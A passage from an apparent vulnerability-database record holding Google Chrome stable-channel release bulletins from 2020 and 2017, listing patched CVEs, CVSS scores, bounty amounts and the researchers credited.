Reported by Clement Lecigne of Google's Threat Analysis Group on 2020-02-18\n\n** \n** \n\n\nGoogle is aware of reports that an exploit for CVE-2020-6418 exists in the wild.\n\n** \n** \n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.\n\n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\n\n\n\n\n\n\n\n\n\nKrishna Govind \nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": 
false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-24T00:00:00", "id": "GCSA-2415374810976728715", "href": "https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T05:32:51", "description": "The Chrome team is delighted to announce the promotion of Chrome 59 to the stable channel for Windows, Mac and Linux. This will roll out over the coming days/weeks.\n\n\n\n\nChrome 59.0.3071.86 contains a number of fixes and improvements -- a list of changes is available in the[ log](<https://chromium.googlesource.com/chromium/src/+log/58.0.3029.110..59.0.3071.86?pretty=fuller&n=10000>). Watch out for upcoming[ Chrome](<http://chrome.blogspot.com/>) and[ Chromium](<http://blog.chromium.org/>) blog posts about new features and big efforts delivered in 59.\n\n\n\n\nChrome Settings has updated to [Material Design](<http://material.io/>) with a slick new look with the same ease of use and functionality. Check it out!\n\n\n\n\n## Security Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [30](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call+label%3ARelease-0-M59>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<http://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$7500][[722756](<https://crbug.com/722756>)] High CVE-2017-5070: Type confusion in V8. 
Reported by Zhao Qixun(@S0rryMybad) of Qihoo 360 Vulcan Team on 2017-05-16\n\n[$3000][[715582](<https://crbug.com/715582>)] High CVE-2017-5071: Out of bounds read in V8. Reported by Choongwoo Han on 2017-04-26\n\n[$3000][[709417](<https://crbug.com/709417>)] High CVE-2017-5072: Address spoofing in Omnibox. Reported by Rayyan Bijoora on 2017-04-07\n\n[$2000][[716474](<https://crbug.com/716474>)] High CVE-2017-5073: Use after free in print preview. Reported by Khalil Zhani on 2017-04-28\n\n[$1000][[700040](<https://crbug.com/700040>)] High CVE-2017-5074: Use after free in Apps Bluetooth. Reported by anonymous on 2017-03-09\n\n[$2000][[678776](<https://crbug.com/678776>)] Medium CVE-2017-5075: Information leak in CSP reporting. Reported by Emmanuel Gil Peyrot on 2017-01-05\n\n[$1000][[722639](<https://crbug.com/722639>)] Medium CVE-2017-5086: Address spoofing in Omnibox. Reported by Rayyan Bijoora on 2017-05-16\n\n[$1000][[719199](<https://crbug.com/719199>)] Medium CVE-2017-5076: Address spoofing in Omnibox. Reported by Samuel Erb on 2017-05-06\n\n[$1000][[716311](<https://crbug.com/716311>)] Medium CVE-2017-5077: Heap buffer overflow in Skia. Reported by Sweetchip on 2017-04-28\n\n[$1000][[711020](<https://crbug.com/711020>)] Medium CVE-2017-5078: Possible command injection in mailto handling. Reported by Jose Carlos Exposito Bueno on 2017-04-12\n\n[$500][[713686](<https://crbug.com/713686>)] Medium CVE-2017-5079: UI spoofing in Blink. Reported by Khalil Zhani on 2017-04-20\n\n[$500][[708819](<https://crbug.com/708819>)] Medium CVE-2017-5080: Use after free in credit card autofill. Reported by Khalil Zhani on 2017-04-05\n\n[$N/A][[672008](<https://crbug.com/672008>)] Medium CVE-2017-5081: Extension verification bypass. Reported by Andrey Kovalev (@L1kvID) Yandex Security Team on 2016-12-07\n\n[$N/A][[721579](<https://crbug.com/721579>)] Low CVE-2017-5082: Insufficient hardening in credit card editor. 